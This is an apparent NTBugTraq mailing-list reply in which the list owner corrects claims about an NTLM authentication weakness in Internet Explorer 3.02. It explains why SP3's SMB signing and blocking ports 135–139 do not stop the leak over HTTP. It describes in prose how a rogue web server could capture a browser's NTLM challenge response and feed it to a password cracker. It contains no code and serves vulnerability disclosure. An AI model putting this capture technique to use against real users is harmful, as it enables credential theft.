This information is incorrect. IE 3.02 does not prevent NTLM
negotiations to take place via HTTP to any server which requests NTLM
authentication.
>I'm still downloading SP3, but after a look at the readme it looked me
that
>SP3 could empower a administrator to fix such bug by enabling the SMB
>signing feature; it would not fix it at installation.
SMB signing does not alter NTLM negotiations, it modifies SMB sessions.
>And with or without SP3, filtering routers blocking 135/137/138/139
ports
>make this exploit and similar ones limited to Intranets.
This information is incorrect. As long as IE is willing to negotiate an
authenticated connection to a HTTP server using NTLM, blocking the ports
you mention will have no effect. Its still possible to retrieve the
information via the HTTP channel. Granted, with the above ports closed
it may not be possible to use this information to exploit a system
through your routers, but this doesn't alter the fact that the
information may become known and exploited internally.
>Hasn't one exploit code been released to SAMBA-DIGEST ? It captures the
>password hashes, which someone could pass to l0phtcrack and similar
>crackers.
I think Aaron was likely referring to the code required on a non-NT web
server to get a browser to send an NTLM challenge response to a
pre-defined challenge, capture it, parse it to obtain the plain-text
equivalent which could then be input into some cracking program.
Cheers,
Russ
R.C. Consulting, Inc. - NT/Internet Security
owner of the NTBugTraq mailing list:
http://ntbugtraq.rc.on.ca/index.html